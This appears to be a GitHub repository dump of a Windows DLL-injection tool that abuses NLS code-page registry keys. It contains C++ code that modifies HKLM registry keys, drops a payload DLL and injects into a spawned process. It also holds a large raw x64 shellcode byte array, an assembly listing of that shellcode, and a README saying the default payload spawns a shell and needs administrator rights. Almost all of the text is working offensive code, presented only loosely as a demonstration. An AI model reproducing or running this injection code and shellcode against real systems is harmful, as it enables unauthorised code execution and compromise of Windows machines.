NULL, NULL, (LPTHREAD_START_ROUTINE)ShellcodeMemory, lpCodePageID, 0, nullptr); 272 | if (hThread == INVALID_HANDLE_VALUE) { 273 | std::printf("Could not open a handle to the payload .exe\n"); 274 | return; 275 | } 276 | std::printf("Sucessfully injected to remote process, where shellcodeMemory is %p, and the codePageID is %d\n", ShellcodeMemory, codePageID); 277 | } 278 | 279 | //Error of payload is at writing the payload.dll! 280 | bool OpenKeyForNlsModification(PRegistryKey regObject) noexcept 281 | { 282 | bool bResult = false; 283 | if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, regObject->getStringBuffer(Index::SUBKEY_KEY_VALUE), 284 | 0, KEY_ALL_ACCESS, ®Object->hSubkeyNls) != EXIT_SUCCESS) 285 | { 286 | std::printf("Could not open handle to subkey of codePage!, LastError [0x%x]\n", GetLastError()); 287 | return bResult; 288 | } 289 | if (!DropSystemDllPayload(regObject)) { 290 | std::printf("Payload dll has been failed to drop main payload \n"); 291 | return bResult; 292 | } 293 | if (!IterateCodePageAndExtractProperId(regObject)){ 294 | std::printf("Could not iterate key for proper modification. Last error: [0x%x]\n", GetLastError()); 295 | return bResult; 296 | } 297 | //DWORD dwCodePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt); 298 | //std::printf("The code page ID is %d\n", dwCodePageID); 299 | //SelfSpawnPayload(dwCodePageID); 300 | if (CreateProcessToInject(®Object->m_procInfo)) 301 | { 302 | InjectStagerToPayload(regObject); 303 | } 304 | 305 | return bResult; 306 | } 307 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/payload.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "headers.hpp" 3 | 4 | 5 | //Appply namespaces to this functions, maybe inside of a class itself :) 6 | BOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive); 7 | bool OpenKeyForNlsModification(PRegistryKey regObject) noexcept; 8 | UINT StringToInt(PWCHAR str) noexcept; 9 | bool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues); 10 | bool IterateCodePageAndExtractProperId(PRegistryKey regObject); 11 | bool CreateProcessToInject(LPPROCESS_INFORMATION procInfo); 12 | bool DropSystemDllPayload(PRegistryKey regObject); 13 | void InjectStagerToPayload(PRegistryKey regObject); 14 | UINT StringToInt(PWCHAR str) noexcept; 15 | UINT StringToIntDecimal(PWCHAR str) noexcept; 16 | 17 | //PIC shellcode. 18 | constexpr BYTE StubInject[] = { 0x56,0x48,0x8b,0xf4,0x48,0x83,0xe4,0xf0,0x48,0x83,0xec,0x20,0xe8,0x05,0x00,0x00,0x00,0x48,0x8b,0xe6,0x5e,0xc3,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x58,0x48,0x8d,0x4c,0x24,0x20,0xe8,0x87,0x00,0x00,0x00,0x85,0xc0,0x74,0x07,0xb8,0x01,0x00,0x00,0x00,0xeb,0x11,0x48,0x8d,0x54,0x24,0x20,0x48,0x8b,0x4c,0x24,0x60,0xe8,0x07,0x00,0x00,0x00,0x33,0xc0,0x48,0x83,0xc4,0x58,0xc3,0x48,0x89,0x54,0x24,0x10,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x38,0x48,0x8b,0x44,0x24,0x40,0x8b,0x00,0x89,0x44,0x24,0x40,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x08,0x48,0x85,0xc0,0x75,0x0e,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x18,0x85,0xc0,0x75,0x02,0xeb,0x2d,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x48,0xff,0x10,0x85,0xc0,0x75,0x02,0xeb,0x1c,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x10,0x85,0xc0,0x75,0x02,0xeb,0x0a,0x33,0xc9,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x20,0x48,0x83,0xc4,0x38,0xc3,0x48,0x89,0x4c,0x24,0x08,0x48,0x81,0xec,0xd8,0x00,0x00,0x00,0xb8,0x6b,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa0,0x00,0x00,0x00,0xb8,0x65,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa2,0x00,0x00,0x00,0xb8,0x72,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa4,0x00,0x00,0x00,0xb8,0x6e,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa6,0x00,0x00,0x00,0xb8,0x65,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa8,0x00,0x00,0x00,0xb8,0x6c,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xaa,0x00,0x00,0x00,0xb8,0x33,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xac,0x00,0x00,0x00,0xb8,0x32,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xae,0x00,0x00,0x00,0xb8,0x2e,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb0,0x00,0x00,0x00,0xb8,0x64,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb2,0x00,0x00,0x00,0xb8,0x6c,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb4,0x00,0x00,0x00,0xb8,0x6c,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb6,0x00,0x00,0x00,0x33,0xc0,0x66,0x89,0x84,0x24,0xb8,0x00,0x00,0x00,0x48,0x8d,0x8c,0x24,0xa0,0x00,0x00,0x00,0xe8,0xe4,0x05,0x00,0x00,0x48,0x89,0x84,0x24,0x98,0x00,0x00,0x00,0x48,0x83,0xbc,0x24,0x98,0x00,0x00,0x00,0x00,0x75,0x0a,0xb8,0x01,0x00,0x00,0x00,0xe9,0x8f,0x03,0x00,0x00,0xc6,0x44,0x24,0x40,0x47,0xc6,0x44,0x24,0x41,0x65,0xc6,0x44,0x24,0x42,0x74,0xc6,0x44,0x24,0x43,0x50,0xc6,0x44,0x24,0x44,0x72,0xc6,0x44,0x24,0x45,0x6f,0xc6,0x44,0x24,0x46,0x63,0xc6,0x44,0x24,0x47,0x41,0xc6,0x44,0x24,0x48,0x64,0xc6,0x44,0x24,0x49,0x64,0xc6,0x44,0x24,0x4a,0x72,0xc6,0x44,0x24,0x4b,0x65,0xc6,0x44,0x24,0x4c,0x73,0xc6,0x44,0x24,0x4d,0x73,0xc6,0x44,0x24,0x4e,0x00,0x48,0x8d,0x54,0x24,0x40,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0xe8,0x3a,0x03,0x00,0x00,0x48,0x89,0x84,0x24,0xc0,0x00,0x00,0x00,0x48,0x83,0xbc,0x24,0xc0,0x00,0x00,0x00,0x00,0x75,0x0a,0xb8,0x03,0x00,0x00,0x00,0xe9,0x15,0x03,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x8b,0x8c,0x24,0xc0,0x00,0x00,0x00,0x48,0x89,0x48,0x28,0xc6,0x44,0x24,0x50,0x47,0xc6,0x44,0x24,0x51,0x65,0xc6,0x44,0x24,0x52,0x74,0xc6,0x44,0x24,0x53,0x43,0xc6,0x44,0x24,0x54,0x6f,0xc6,0x44,0x24,0x55,0x6e,0xc6,0x44,0x24,0x56,0x73,0xc6,0x44,0x24,0x57,0x6f,0xc6,0x44,0x24,0x58,0x6c,0xc6,0x44,0x24,0x59,0x65,0xc6,0x44,0x24,0x5a,0x57,0xc6,0x44,0x24,0x5b,0x69,0xc6,0x44,0x24,0x5c,0x6e,0xc6,0x44,0x24,0x5d,0x64,0xc6,0x44,0x24,0x5e,0x6f,0xc6,0x44,0x24,0x5f,0x77,0xc6,0x44,0x24,0x60,0x00,0xc6,0x44,0x24,0x30,0x41,0xc6,0x44,0x24,0x31,0x6c,0xc6,0x44,0x24,0x32,0x6c,0xc6,0x44,0x24,0x33,0x6f,0xc6,0x44,0x24,0x34,0x63,0xc6,0x44,0x24,0x35,0x43,0xc6,0x44,0x24,0x36,0x6f,0xc6,0x44,0x24,0x37,0x6e,0xc6,0x44,0x24,0x38,0x73,0xc6,0x44,0x24,0x39,0x6f,0xc6,0x44,0x24,0x3a,0x6c,0xc6,0x44,0x24,0x3b,0x65,0xc6,0x44,0x24,0x3c,0x00,0xc6,0x44,0x24,0x20,0x53,0xc6,0x44,0x24,0x21,0x65,0xc6,0x44,0x24,0x22,0x74,0xc6,0x44,0x24,0x23,0x43,0xc6,0x44,0x24,0x24,0x6f,0xc6,0x44,0x24,0x25,0x6e,0xc6,0x44,0x24,0x26,0x73,0xc6,0x44,0x24,0x27,0x6f,0xc6,0x44,0x24,0x28,0x6c,0xc6,0x44,0x24,0x29,0x65,0xc6,0x44,0x24,0x2a,0x43,0xc6,0x44,0x24,0x2b,0x50,0xc6,0x44,0x24,0x2c,0x00,0xc6,0x44,0x24,0x68,0x53,0xc6,0x44,0x24,0x69,0x65,0xc6,0x44,0x24,0x6a,0x74,0xc6,0x44,0x24,0x6b,0x43,0xc6,0x44,0x24,0x6c,0x6f,0xc6,0x44,0x24,0x6d,0x6e,0xc6,0x44,0x24,0x6e,0x73,0xc6,0x44,0x24,0x6f,0x6f,0xc6,0x44,0x24,0x70,0x6c,0xc6,0x44,0x24,0x71,0x65,0xc6,0x44,0x24,0x72,0x4f,0xc6,0x44,0x24,0x73,0x75,0xc6,0x44,0x24,0x74,0x74,0xc6,0x44,0x24,0x75,0x70,0xc6,0x44,0x24,0x76,0x75,0xc6,0x44,0x24,0x77,0x74,0xc6,0x44,0x24,0x78,0x43,0xc6,0x44,0x24,0x79,0x50,0xc6,0x44,0x24,0x7a,0x00,0xc6,0x84,0x24,0x80,0x00,0x00,0x00,0x53,0xc6,0x84,0x24,0x81,0x00,0x00,0x00,0x65,0xc6,0x84,0x24,0x82,0x00,0x00,0x00,0x74,0xc6,0x84,0x24,0x83,0x00,0x00,0x00,0x54,0xc6,0x84,0x24,0x84,0x00,0x00,0x00,0x68,0xc6,0x84,0x24,0x85,0x00,0x00,0x00,0x72,0xc6,0x84,0x24,0x86,0x00,0x00,0x00,0x65,0xc6,0x84,0x24,0x87,0x00,0x00,0x00,0x61,0xc6,0x84,0x24,0x88,0x00,0x00,0x00,0x64,0xc6,0x84,0x24,0x89,0x00,0x00,0x00,0x55,0xc6,0x84,0x24,0x8a,0x00,0x00,0x00,0x49,0xc6,0x84,0x24,0x8b,0x00,0x00,0x00,0x4c,0xc6,0x84,0x24,0x8c,0x00,0x00,0x00,0x61,0xc6,0x84,0x24,0x8d,0x00,0x00,0x00,0x6e,0xc6,0x84,0x24,0x8e,0x00,0x00,0x00,0x67,0xc6,0x84,0x24,0x8f,0x00,0x00,0x00,0x75,0xc6,0x84,0x24,0x90,0x00,0x00,0x00,0x61,0xc6,0x84,0x24,0x91,0x00,0x00,0x00,0x67,0xc6,0x84,0x24,0x92,0x00,0x00,0x00,0x65,0xc6,0x84,0x24,0x93,0x00,0x00,0x00,0x00,0x48,0x8d,0x54,0x24,0x68,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x01,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x38,0x00,0x75,0x0a,0xb8,0x04,0x00,0x00,0x00,0xe9,0xf0,0x00,0x00,0x00,0x48,0x8d,0x54,0x24,0x50,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x08,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x08,0x00,0x75,0x0a,0xb8,0x05,0x00,0x00,0x00,0xe9,0xb3,0x00,0x00,0x00,0x48,0x8d,0x54,0x24,0x20,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x10,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x10,0x00,0x75,0x07,0xb8,0x06,0x00,0x00,0x00,0xeb,0x79,0x48,0x8d,0x54,0x24,0x30,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x18,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x18,0x00,0x75,0x07,0xb8,0x07,0x00,0x00,0x00,0xeb,0x3f,0x48,0x8d,0x94,0x24,0x80,0x00,0x00,0x00,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x20,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x20,0x00,0x75,0x07,0xb8,0x08,0x00,0x00,0x00,0xeb,0x02,0x33,0xc0,0x48,0x81,0xc4,0xd8,0x00,0x00,0x00,0xc3,0x48,0x89,0x54,0x24,0x10,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x78,0x48,0x8b,0x84,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x30,0x48,0x8b,0x44,0x24,0x30,0x0f,0xb7,0x00,0x3d,0x4d,0x5a,0x00,0x00,0x74,0x07,0x33,0xc0,0xe9,0xfa,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x30,0x48,0x63,0x40,0x3c,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89,0x44,0x24,0x40,0xb8,0x08,0x00,0x00,0x00,0x48,0x6b,0xc0,0x00,0x48,0x8b,0x4c,0x24,0x40,0x48,0x8d,0x84,0x01,0x88,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x38,0x48,0x8b,0x44,0x24,0x38,0x83,0x38,0x00,0x75,0x07,0x33,0xc0,0xe9,0xb2,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x38,0x8b,0x00,0x89,0x44,0x24,0x18,0x8b,0x44,0x24,0x18,0x48,0x03,0x84,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x10,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x18,0x48,0x89,0x44,0x24,0x48,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x1c,0x89,0x44,0x24,0x24,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x20,0x89,0x44,0x24,0x1c,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x24,0x89,0x44,0x24,0x20,0x48,0xc7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xeb,0x0d,0x48,0x8b,0x44,0x24,0x08,0x48,0xff,0xc0,0x48,0x89,0x44,0x24,0x08,0x48,0x8b,0x44,0x24,0x48,0x48,0x39,0x44,0x24,0x08,0x0f,0x83,0x3b,0x01,0x00,0x00,0x8b,0x44,0x24,0x1c,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x8b,0x4c,0x24,0x08,0x48,0x8d,0x04,0x88,0x48,0x89,0x44,0x24,0x58,0x8b,0x44,0x24,0x20,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x8b,0x4c,0x24,0x08,0x48,0x8d,0x04,0x48,0x48,0x89,0x44,0x24,0x50,0x8b,0x44,0x24,0x24,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x8b,0x4c,0x24,0x50,0x0f,0xb7,0x09,0x48,0x8d,0x04,0x88,0x48,0x89,0x44,0x24,0x60,0x48,0x8b,0x44,0x24,0x58,0x8b,0x00,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89,0x44,0x24,0x28,0x48,0xc7,0x04,0x24,0x00,0x00,0x00,0x00,0xeb,0x0b,0x48,0x8b,0x04,0x24,0x48,0xff,0xc0,0x48,0x89,0x04,0x24,0x48,0x8b,0x04,0x24,0x48,0x8b,0x8c,0x24,0x88,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x74,0x45,0x48,0x8b,0x04,0x24,0x48,0x8b,0x4c,0x24,0x28,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x74,0x2f,0x48,0x8b,0x04,0x24,0x48,0x8b,0x8c,0x24,0x88,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x48,0x8b,0x0c,0x24,0x48,0x8b,0x54,0x24,0x28,0x48,0x03,0xd1,0x48,0x8b,0xca,0x0f,0xbe,0x09,0x3b,0xc1,0x74,0x02,0xeb,0x02,0xeb,0x97,0x48,0x8b,0x04,0x24,0x48,0x8b,0x8c,0x24,0x88,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x75,0x2d,0x48,0x8b,0x04,0x24,0x48,0x8b,0x4c,0x24,0x28,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x75,0x17,0x48,0x8b,0x44,0x24,0x60,0x8b,0x00,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0xeb,0x07,0xe9,0xa8,0xfe,0xff,0xff,0x33,0xc0,0x48,0x83,0xc4,0x78,0xc3,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x58,0x65,0x48,0x8b,0x04,0x25,0x60,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x40,0x48,0x8b,0x44,0x24,0x40,0x48,0x8b,0x40,0x18,0x48,0x89,0x44,0x24,0x48,0x48,0x8b,0x44,0x24,0x48,0x48,0x83,0xc0,0x20,0x48,0x89,0x44,0x24,0x38,0x48,0x8b,0x44,0x24,0x38,0x48,0x8b,0x00,0x48,0x89,0x44,0x24,0x30,0xeb,0x0d,0x48,0x8b,0x44,0x24,0x30,0x48,0x8b,0x00,0x48,0x89,0x44,0x24,0x30,0x48,0x8b,0x44,0x24,0x38,0x48,0x39,0x44,0x24,0x30,0x0f,0x84,0xbf,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x30,0x48,0x83,0xe8,0x10,0x48,0x89,0x44,0x24,0x28,0x48,0x83,0x7c,0x24,0x28,0x00,0x74,0x0c,0x48,0x8b,0x44,0x24,0x28,0x48,0x83,0x78,0x30,0x00,0x75,0x05,0xe9,0x98,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x28,0x48,0x8b,0x40,0x60,0x48,0x89,0x44,0x24,0x10,0x48,0x83,0x7c,0x24,0x10,0x00,0x75,0x02,0xeb,0xa4,0x48,0xc7,0x04,0x24,0x00,0x00,0x00,0x00,0xeb,0x0b,0x48,0x8b,0x04,0x24,0x48,0xff,0xc0,0x48,0x89,0x04,0x24,0x48,0x8b,0x44,0x24,0x28,0x0f,0xb7,0x40,0x58,0x48,0x39,0x04,0x24,0x0f,0x83,0x26,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x74,0x11,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x75,0x05,0xe9,0xff,0x00,0x00,0x00,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x5a,0x7f,0x47,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x41,0x7c,0x35,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xe8,0x41,0x83,0xc0,0x61,0x89,0x44,0x24,0x20,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x54,0x24,0x20,0x66,0x89,0x14,0x48,0x0f,0xb7,0x44,0x24,0x20,0x66,0x89,0x44,0x24,0x08,0xeb,0x12,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x66,0x89,0x44,0x24,0x08,0x0f,0xb7,0x44,0x24,0x08,0x66,0x89,0x44,0x24,0x18,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x5a,0x7f,0x47,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x41,0x7c,0x35,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xe8,0x41,0x83,0xc0,0x61,0x89,0x44,0x24,0x24,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x54,0x24,0x24,0x66,0x89,0x14,0x48,0x0f,0xb7,0x44,0x24,0x24,0x66,0x89,0x44,0x24,0x0a,0xeb,0x12,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x66,0x89,0x44,0x24,0x0a,0x0f,0xb7,0x44,0x24,0x0a,0x66,0x89,0x44,0x24,0x1c,0x0f,0xb7,0x44,0x24,0x18,0x0f,0xb7,0x4c,0x24,0x1c,0x3b,0xc1,0x74,0x02,0xeb,0x05,0xe9,0xbc,0xfe,0xff,0xff,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x75,0x1c,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x75,0x0b,0x48,0x8b,0x44,0x24,0x28,0x48,0x8b,0x40,0x30,0xeb,0x07,0xe9,0x24,0xfe,0xff,0xff,0x33,0xc0,0x48,0x83,0xc4,0x58,0xc3,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; 19 | constexpr size_t lengthInject = std::size(StubInject); 20 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/resource1.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/resource1.h -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NlsCodeInjectionThroughRegistry 2 | Dll injection through registry modification of NLS code page ID. 3 | 4 | It requieres administrator privileges, but it definetely works. 5 | 6 | # How does it work? 7 | It is based on jonas lykk discovery here: https://twitter.com/jonaslyk/status/1352729173631135751?lang=en 8 | 9 | There is two ways to accomplish this: 10 | Either call SetThreadLocale and set up an export function named NlsDllCodePageTranslation, where your main payload is in there. 11 | Or the second method, which is actually implemented here, it is possible to execute using functions such as SetConsoleCp or SetConsoleOutputCP, you dont care about exports at all. 12 | 13 | If the process is not console based, you can allocate one with AllocConsole, payload will still get triggered. 14 | 15 | For this reason, to make it to work, I had to create position independent shellcode and inject it to a remote process, which works as a stager to the actual loading of the dll. 16 | This is just meant for demostration purposes. 17 | 18 | One day in the future I will reverse a little bit better how this works, if i have time. 19 | 20 | # How to use? 21 | Compile the project in release x64, it uses the default jonas payload, which spawns a shell when loaded. 22 | ShellcodeInjection is just an additional project I used to convert C to shellcode, using hasherezade method described here: 23 | https://github.com/vxunderground/VXUG-Papers/blob/main/From%20a%20C%20project%20through%20assembly%20to%20shellcode.pdf 24 | 25 | Only x64, tested in Windows 11. 26 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.asm: -------------------------------------------------------------------------------- 1 | ; Listing generated by Microsoft (R) Optimizing Compiler Version 19.30.30706.0 2 | 3 | include listing.inc 4 | 5 | ;INCLUDELIB LIBCMT 6 | ;INCLUDELIB OLDNAMES 7 | 8 | PUBLIC ?iat_kernel32@@3Ukernel32Iat@@A ; iat_kernel32 9 | PUBLIC ?piat_struct32@@3PEAUkernel32Iat@@EA ; piat_struct32 10 | _BSS SEGMENT 11 | ?iat_kernel32@@3Ukernel32Iat@@A DB 030H DUP (?) ; iat_kernel32 12 | ?piat_struct32@@3PEAUkernel32Iat@@EA DQ 01H DUP (?) ; piat_struct32 13 | _BSS ENDS 14 | PUBLIC ?GetModuleByName@@YAPEAXPEA_W@Z ; GetModuleByName 15 | PUBLIC ?GetFunctionByName@@YAPEAXPEAXPEAD@Z ; GetFunctionByName 16 | PUBLIC ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z ; initializeIatShellcode 17 | PUBLIC ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z ; SpawnPayload 18 | PUBLIC main 19 | ; COMDAT voltbl 20 | voltbl SEGMENT 21 | _volmd DB 09H 22 | voltbl ENDS 23 | ; Function compile flags: /Odtp 24 | _TEXT SEGMENT 25 | AlignRSP PROC 26 | push rsi ; Preserve RSI since we're stomping on it 27 | mov rsi, rsp ; Save the value of RSP so it can be restored 28 | and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes 29 | sub rsp, 020h ; Allocate homing space for ExecutePayload 30 | call main ; Call the entry point of the payload 31 | mov rsp, rsi ; Restore the original value of RSP 32 | pop rsi ; Restore RSI 33 | ret ; Return to caller 34 | AlignRSP ENDP 35 | _TEXT ENDS 36 | 37 | _TEXT SEGMENT 38 | iat$ = 32 39 | dwCodeID$ = 96 40 | main PROC 41 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\ShellcodeInjection.cpp 42 | ; Line 69 43 | $LN4: 44 | mov QWORD PTR [rsp+8], rcx 45 | sub rsp, 88 ; 00000058H 46 | ; Line 71 47 | lea rcx, QWORD PTR iat$[rsp] 48 | call ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z ; initializeIatShellcode 49 | test eax, eax 50 | je SHORT $LN2@main 51 | ; Line 72 52 | mov eax, 1 53 | jmp SHORT $LN1@main 54 | $LN2@main: 55 | ; Line 74 56 | lea rdx, QWORD PTR iat$[rsp] 57 | mov rcx, QWORD PTR dwCodeID$[rsp] 58 | call ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z ; SpawnPayload 59 | ; Line 76 60 | xor eax, eax 61 | $LN1@main: 62 | ; Line 77 63 | add rsp, 88 ; 00000058H 64 | ret 0 65 | main ENDP 66 | _TEXT ENDS 67 | ; Function compile flags: /Odtp 68 | _TEXT SEGMENT 69 | dwCodePageID$ = 32 70 | dwCodePageId$ = 64 71 | iat$ = 72 72 | ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z PROC ; SpawnPayload 73 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\ShellcodeInjection.cpp 74 | ; Line 51 75 | $LN7: 76 | mov QWORD PTR [rsp+16], rdx 77 | mov QWORD PTR [rsp+8], rcx 78 | sub rsp, 56 ; 00000038H 79 | ; Line 52 80 | mov rax, QWORD PTR dwCodePageId$[rsp] 81 | mov eax, DWORD PTR [rax] 82 | mov DWORD PTR dwCodePageID$[rsp], eax 83 | ; Line 53 84 | mov rax, QWORD PTR iat$[rsp] 85 | call QWORD PTR [rax+8] 86 | test rax, rax 87 | jne SHORT $LN2@SpawnPaylo 88 | ; Line 55 89 | mov rax, QWORD PTR iat$[rsp] 90 | call QWORD PTR [rax+24] 91 | test eax, eax 92 | jne SHORT $LN3@SpawnPaylo 93 | ; Line 56 94 | jmp SHORT $LN1@SpawnPaylo 95 | $LN3@SpawnPaylo: 96 | $LN2@SpawnPaylo: 97 | ; Line 59 98 | mov ecx, DWORD PTR 